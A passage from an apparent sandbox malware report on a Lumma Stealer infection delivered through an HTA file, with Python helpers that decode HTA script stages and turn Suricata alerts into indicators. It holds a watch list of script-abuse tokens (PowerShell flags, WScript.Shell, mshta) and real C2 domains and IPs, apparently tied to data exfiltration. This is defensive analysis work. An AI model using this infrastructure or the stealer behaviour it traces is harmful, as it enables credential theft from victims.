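UNESCAPE_ARG_RE = re.compile(r"""unescape\s*\(\s*(['"])(.*?)(?:\1|$)""", re.S)
# Example's own watch list of tokens worth a second look in decoded HTA script.
SUSPICIOUS = ("ActiveXObject", "WScript.Shell", "Shell.Application", "powershell",
              "cmd.exe", "mshta", "ExecutionPolicy", "-w hidden", "-enc", "eval(")


def js_unescape(encoded: str) -> str:
    """Emulate JavaScript's legacy unescape(): %XX and %uXXXX each become one
    code point; malformed sequences are left untouched, as the engine does."""
    return TOKEN_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), encoded)


def js_escape(text: str) -> str:
    """Inverse of js_unescape (legacy escape(): A-Z a-z 0-9 @*_+-./ pass through).
    Used here only to build round-trip test inputs."""
    out = []
    for ch in text:
        cp = ord(ch)
        if ch.isascii() and (ch.isalnum() or ch in "@*_+-./"):
            out.append(ch)
        elif cp < 0x100:
            out.append(f"%{cp:02X}")
        else:
            out.append(f"%u{cp:04X}")
    return "".join(out)


def extract_unescape_args(hta_text: str) -> list:
    """Every string literal passed to unescape(), in document order."""
    return [m.group(2) for m in UNESCAPE_ARG_RE.finditer(hta_text)]


def decode_hta(hta_text: str) -> list:
    """Decoded second-stage script for each unescape() call found."""
    return [js_unescape(arg) for arg in extract_unescape_args(hta_text)]


def suspicious_tokens(decoded: str) -> list:
    """Watch-list tokens present in the decoded script (case-insensitive)."""
    low = decoded.lower()
    return [t for t in SUSPICIOUS if t.lower() in low]


if __name__ == "__main__":
    for stage in decode_hta(HTA_PREVIEW):
        print(stage)
        print("suspicious tokens:", suspicious_tokens(stage))
```

Run against a complete HTA rather than the truncated preview, the decoded stage is where the `ActiveXObject("WScript.Shell")` and PowerShell command line would appear; on the preview alone the token list is empty, which is the correct answer for the bytes the report shows.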
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-12T07:52:07.811536+0100 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 2 | 192.168.2.4 | 49734 | 147.45.44.131 | 80 | TCP
2024-12-12T07:52:08.708627+0100 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 2 | 192.168.2.4 | 49734 | 147.45.44.131 | 80 | TCP
2024-12-12T07:52:10.958689+0100 | 2057949 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz) | 1 | 192.168.2.4 | 54123 | 1.1.1.1 | 53 | UDP
2024-12-12T07:52:10.958689+0100 | 2057981 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz) | 1 | 192.168.2.4 | 54123 | 1.1.1.1 | 53 | UDP
2024-12-12T07:52:11.188817+0100 | 2057945 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz) | 1 | 192.168.2.4 | 65361 | 1.1.1.1 | 53 | UDP
2024-12-12T07:52:11.188817+0100 | 2057983 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz) | 1 | 192.168.2.4 | 65361 | 1.1.1.1 | 53 | UDP
2024-12-12T07:52:11.432886+0100 | 2057929 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz) | 1 | 192.168.2.4 | 58836 | 1.1.1.1 | 53 | UDP
2024-12-12T07:52:11.432886+0100 | 2057979 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz) | 1 | 192.168.2.4 | 58836 | 1.1.1.1 | 53 | UDP
2024-12-12T07:52:11.676415+0100 | 2057931 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz) | 1 | 192.168.2.4 | 60620 | 1.1.1.1 | 53 | UDP
2024-12-12T07:52:11.676415+0100 | 2057977 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz) | 1 | 192.168.2.4 | 60620 | 1.1.1.1 | 53 | UDP
2024-12-12T07:52:11.967953+0100 | 2057925 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz) | 1 | 192.168.2.4 | 58954 | 1.1.1.1 | 53 | UDP
2024-12-12T07:52:11.967953+0100 | 2057973 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz) | 1 | 192.168.2.4 | 58954 | 1.1.1.1 | 53 | UDP
2024-12-12T07:52:13.534646+0100 | 2057926 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) | 1 | 192.168.2.4 | 49737 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:13.534646+0100 | 2057974 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) | 1 | 192.168.2.4 | 49737 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:13.534646+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49737 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:14.256631+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49737 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:14.256631+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49737 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:16.055149+0100 | 2057926 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) | 1 | 192.168.2.4 | 49738 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:16.055149+0100 | 2057974 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) | 1 | 192.168.2.4 | 49738 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:16.055149+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49738 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:16.781738+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49738 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:16.781738+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49738 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:18.227210+0100 | 2057926 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) | 1 | 192.168.2.4 | 49739 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:18.227210+0100 | 2057974 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) | 1 | 192.168.2.4 | 49739 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:18.227210+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49739 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:19.083711+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49739 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:20.349759+0100 | 2057926 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) | 1 | 192.168.2.4 | 49740 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:20.349759+0100 | 2057974 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) | 1 | 192.168.2.4 | 49740 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:20.349759+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49740 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:22.415356+0100 | 2057926 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) | 1 | 192.168.2.4 | 49742 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:22.415356+0100 | 2057974 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) | 1 | 192.168.2.4 | 49742 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:22.415356+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49742 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:25.613617+0100 | 2057926 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) | 1 | 192.168.2.4 | 49746 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:25.613617+0100 | 2057974 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) | 1 | 192.168.2.4 | 49746 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:25.613617+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49746 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:28.579229+0100 | 2057926 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) | 1 | 192.168.2.4 | 49748 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:28.579229+0100 | 2057974 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) | 1 | 192.168.2.4 | 49748 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:28.579229+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49748 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:28.593209+0100 | 2843864 | ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 | 1 | 192.168.2.4 | 49748 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:33.452236+0100 | 2057926 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) | 1 | 192.168.2.4 | 49750 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:33.452236+0100 | 2057974 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) | 1 | 192.168.2.4 | 49750 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:33.452236+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49750 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:34.269240+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49750 | 172.67.206.64 | 443 | TCP
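The alert rows above carry everything needed for an indicator list, but the ET rule messages defang the domains with a space (`zinc-sneark .biz`) and the DNS rows point at the sandbox resolver rather than attacker infrastructure, so a copy-paste of the table produces bad indicators. The following is an added example, not Joe Sandbox or Suricata code: it parses a hand-transcribed subset of the alert rows (one per distinct signature, pipe-separated in the table's column order), re-fangs the domains, records whether each was seen in DNS or in a TLS SNI, and keeps only remote endpoints. `RESOLVERS` and the `192.168.` filter are assumptions about the sandbox network; the `[.]` defang form is handled as a generalisation beyond what this report uses.

```python
"""
Turn this report's Suricata alert rows into a de-duplicated IOC set.

Added example; not part of the Joe Sandbox report. ALERT_ROWS is transcribed
from the alert table (one row per distinct signature); the parsing and
re-fanging logic is this example's own.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

ALERT_ROWS = """
2024-12-12T07:52:07.811536+0100 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 2 | 192.168.2.4 | 49734 | 147.45.44.131 | 80 | TCP
2024-12-12T07:52:10.958689+0100 | 2057949 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz) | 1 | 192.168.2.4 | 54123 | 1.1.1.1 | 53 | UDP
2024-12-12T07:52:11.188817+0100 | 2057945 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz) | 1 | 192.168.2.4 | 65361 | 1.1.1.1 | 53 | UDP
2024-12-12T07:52:11.432886+0100 | 2057929 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz) | 1 | 192.168.2.4 | 58836 | 1.1.1.1 | 53 | UDP
2024-12-12T07:52:11.676415+0100 | 2057931 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz) | 1 | 192.168.2.4 | 60620 | 1.1.1.1 | 53 | UDP
2024-12-12T07:52:11.967953+0100 | 2057925 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz) | 1 | 192.168.2.4 | 58954 | 1.1.1.1 | 53 | UDP
2024-12-12T07:52:13.534646+0100 | 2057926 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) | 1 | 192.168.2.4 | 49737 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:13.534646+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49737 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:14.256631+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49737 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:19.083711+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49739 | 172.67.206.64 | 443 | TCP
2024-12-12T07:52:28.593209+0100 | 2843864 | ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 | 1 | 192.168.2.4 | 49748 | 172.67.206.64 | 443 | TCP
"""

RESOLVERS = {"1.1.1.1"}   # assumption: the sandbox's resolver, not attacker infrastructure
# ET messages defang with a space ("zinc-sneark .biz"); "[.]" is accepted as well.
DEFANGED_RE = re.compile(r"([a-z0-9][a-z0-9-]*)(?:\s\.|\[\.\])([a-z]{2,})", re.I)


@dataclass
class Alert:
    ts: str
    sid: int
    msg: str
    severity: int
    src: str
    sport: int
    dst: str
    dport: int
    proto: str


def parse_rows(text: str) -> list:
    """One Alert per pipe-separated row; rows without nine columns are skipped."""
    alerts = []
    for line in text.strip().splitlines():
        f = [c.strip() for c in line.split("|")]
        if len(f) != 9:
            continue
        alerts.append(Alert(f[0], int(f[1]), f[2], int(f[3]), f[4], int(f[5]), f[6], int(f[7]), f[8]))
    return alerts


def refang_domains(msg: str) -> list:
    """Recover the real domain(s) from a defanged rule message."""
    return [f"{label}.{tld}".lower() for label, tld in DEFANGED_RE.findall(msg)]


def extract_iocs(alerts: list) -> dict:
    """Domains with where they were seen, remote endpoints, SIDs, and the time span."""
    domains, endpoints, sids = defaultdict(set), set(), set()
    for a in alerts:
        sids.add(a.sid)
        for d in refang_domains(a.msg):
            domains[d].add("tls_sni" if "SNI" in a.msg else "dns")
        # keep only the remote side: the sandbox host and its resolver are not IOCs
        for ip, port in ((a.src, a.sport), (a.dst, a.dport)):
            if not ip.startswith("192.168.") and ip not in RESOLVERS:
                endpoints.add((ip, port, a.proto))
    return {
        "domains": {d: sorted(v) for d, v in sorted(domains.items())},
        "endpoints": sorted(endpoints),
        "sids": sorted(sids),
        "first_seen": min(a.ts for a in alerts) if alerts else None,
        "last_seen": max(a.ts for a in alerts) if alerts else None,
    }


if __name__ == "__main__":
    import json
    print(json.dumps(extract_iocs(parse_rows(ALERT_ROWS)), indent=2))
```

Of the five DNS-looked-up domains only covery-mover .biz also shows up in a TLS SNI, which is the one that actually answered; the other four are still worth blocking, but the distinction matters when deciding which indicator proves contact rather than attempted contact.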
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 12, 2024 07:52:04.103553057 CET | 49732 | 80 | 192.168.2.4 | 45.131.135.227
Dec 12, 2024 07:52:04.222999096 CET | 80 | 49732 | 45.131.135.227 | 192.168.2.4
Dec 12, 2024 07:52:04.223155975 CET | 49732 | 80 | 192.168.2.4 | 45.131.135.227
Dec 12, 2024 07:52:04.226413965 CET | 49732 | 80 | 192.168.2.4 | 45.131.135.227
Dec 12, 2024 07:52:04.345954895 CET | 80 | 49732 | 45.131.135.227 | 192.168.2.4
Dec 12, 2024 07:52:05.471096992 CET | 80 | 49732 | 45.131.135.227 | 192.168.2.4
Dec 12, 2024 07:52:05.471191883 CET | 80 | 49732 | 45.131.135.227 | 192.168.2.4
Dec 12, 2024 07:52:05.471271992 CET | 49732 | 80 | 192.168.2.4 | 45.131.135.227
Dec 12, 2024 07:52:05.707577944 CET | 80 | 49732 | 45.131.135.227 | 192.168.2.4
Dec 12, 2024 07:52:05.759459972 CET | 49732 | 80 | 192.168.2.4 | 45.131.135.227
Dec 12, 2024 07:52:06.421961069 CET | 49734 | 80 | 192.168.2.4 | 147.45.44.131
Dec 12, 2024 07:52:06.541516066 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:06.541675091 CET | 49734 | 80 | 192.168.2.4 | 147.45.44.131
Dec 12, 2024 07:52:06.541960001 CET | 49734 | 80 | 192.168.2.4 | 147.45.44.131
Dec 12, 2024 07:52:06.661348104 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:07.811290026 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:07.811446905 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:07.811464071 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:07.811536074 CET | 49734 | 80 | 192.168.2.4 | 147.45.44.131
Dec 12, 2024 07:52:07.812125921 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:07.812143087 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:07.812225103 CET | 49734 | 80 | 192.168.2.4 | 147.45.44.131
Dec 12, 2024 07:52:07.812849045 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:07.812879086 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:07.812903881 CET | 49734 | 80 | 192.168.2.4 | 147.45.44.131
Dec 12, 2024 07:52:07.813618898 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:07.813647032 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:07.813677073 CET | 49734 | 80 | 192.168.2.4 | 147.45.44.131
Dec 12, 2024 07:52:07.814253092 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:07.814327002 CET | 49734 | 80 | 192.168.2.4 | 147.45.44.131
Dec 12, 2024 07:52:07.931004047 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:07.931086063 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:07.931297064 CET | 49734 | 80 | 192.168.2.4 | 147.45.44.131
Dec 12, 2024 07:52:08.003937006 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:08.004113913 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:08.004203081 CET | 49734 | 80 | 192.168.2.4 | 147.45.44.131
Dec 12, 2024 07:52:08.007622957 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:08.007746935 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:08.007811069 CET | 49734 | 80 | 192.168.2.4 | 147.45.44.131
Dec 12, 2024 07:52:08.014049053 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:08.014221907 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:08.014319897 CET | 49734 | 80 | 192.168.2.4 | 147.45.44.131
Dec 12, 2024 07:52:08.022439003 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:08.022569895 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:08.024233103 CET | 49734 | 80 | 192.168.2.4 | 147.45.44.131
Dec 12, 2024 07:52:08.030858040 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:08.031008005 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:08.031521082 CET | 49734 | 80 | 192.168.2.4 | 147.45.44.131
Dec 12, 2024 07:52:08.039213896 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:08.039387941 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:08.039454937 CET | 49734 | 80 | 192.168.2.4 | 147.45.44.131
Dec 12, 2024 07:52:08.047583103 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:08.047811031 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:08.047888994 CET | 49734 | 80 | 192.168.2.4 | 147.45.44.131
Dec 12, 2024 07:52:08.056159973 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:08.056308985 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:08.056401968 CET | 49734 | 80 | 192.168.2.4 | 147.45.44.131
Dec 12, 2024 07:52:08.064330101 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:08.064502001 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:08.064563036 CET | 49734 | 80 | 192.168.2.4 | 147.45.44.131
Dec 12, 2024 07:52:08.072797060 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:08.072921038 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:08.072999001 CET | 49734 | 80 | 192.168.2.4 | 147.45.44.131
Dec 12, 2024 07:52:08.081206083 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:08.081381083 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:08.081480980 CET | 49734 | 80 | 192.168.2.4 | 147.45.44.131
Dec 12, 2024 07:52:08.195683002 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:08.195712090 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:08.195895910 CET | 49734 | 80 | 192.168.2.4 | 147.45.44.131
Dec 12, 2024 07:52:08.198013067 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:08.198136091 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:08.198232889 CET | 49734 | 80 | 192.168.2.4 | 147.45.44.131
Dec 12, 2024 07:52:08.203052044 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:08.243973017 CET | 49734 | 80 | 192.168.2.4 | 147.45.44.131
Dec 12, 2024 07:52:08.304292917 CET | 49734 | 80 | 192.168.2.4 | 147.45.44.131
Dec 12, 2024 07:52:08.304721117 CET | 49732 | 80 | 192.168.2.4 | 45.131.135.227
Dec 12, 2024 07:52:08.424082994 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:08.424508095 CET | 80 | 49732 | 45.131.135.227 | 192.168.2.4
Dec 12, 2024 07:52:08.424632072 CET | 49732 | 80 | 192.168.2.4 | 45.131.135.227
Dec 12, 2024 07:52:08.708161116 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:08.708189964 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:08.708626986 CET | 49734 | 80 | 192.168.2.4 | 147.45.44.131
Dec 12, 2024 07:52:08.710138083 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:08.710326910 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:08.710407972 CET | 49734 | 80 | 192.168.2.4 | 147.45.44.131
Dec 12, 2024 07:52:08.714948893 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:08.715112925 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:08.715183973 CET | 49734 | 80 | 192.168.2.4 | 147.45.44.131
Dec 12, 2024 07:52:08.719655991 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:08.719841957 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:08.719907045 CET | 49734 | 80 | 192.168.2.4 | 147.45.44.131
Dec 12, 2024 07:52:08.724469900 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:08.724714994 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:08.724785089 CET | 49734 | 80 | 192.168.2.4 | 147.45.44.131
Dec 12, 2024 07:52:08.729223967 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:08.729399920 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:08.729551077 CET | 49734 | 80 | 192.168.2.4 | 147.45.44.131
Dec 12, 2024 07:52:09.821984053 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:09.822134972 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:09.822173119 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:09.822247982 CET | 49734 | 80 | 192.168.2.4 | 147.45.44.131
Dec 12, 2024 07:52:09.822767973 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:09.822830915 CET | 49734 | 80 | 192.168.2.4 | 147.45.44.131
Dec 12, 2024 07:52:09.823230982 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:09.823281050 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:09.823345900 CET | 49734 | 80 | 192.168.2.4 | 147.45.44.131
Dec 12, 2024 07:52:09.824167013 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:09.824202061 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:09.824259043 CET | 49734 | 80 | 192.168.2.4 | 147.45.44.131
Dec 12, 2024 07:52:09.825191975 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:09.825226068 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:09.825289011 CET | 49734 | 80 | 192.168.2.4 | 147.45.44.131
Dec 12, 2024 07:52:09.825968981 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:09.826003075 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:09.826060057 CET | 49734 | 80 | 192.168.2.4 | 147.45.44.131
Dec 12, 2024 07:52:09.826900005 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:09.826936007 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:09.826968908 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
Dec 12, 2024 07:52:09.826983929 CET | 49734 | 80 | 192.168.2.4 | 147.45.44.131
Dec 12, 2024 07:52:09.827848911 CET | 80 | 49734 | 147.45.44.131 | 192.168.2.4
                                                                        Dec 12, 2024 07:52:09.827884912 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.827898979 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.828787088 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.828819990 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.828841925 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.829754114 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.829787970 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.829809904 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.830743074 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.830776930 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.830790997 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.830810070 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.830861092 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.831543922 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.831579924 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.831693888 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.832487106 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.832526922 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.832592964 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.833314896 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.833355904 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.835175991 CET8049734147.45.44.131192.168.2.4
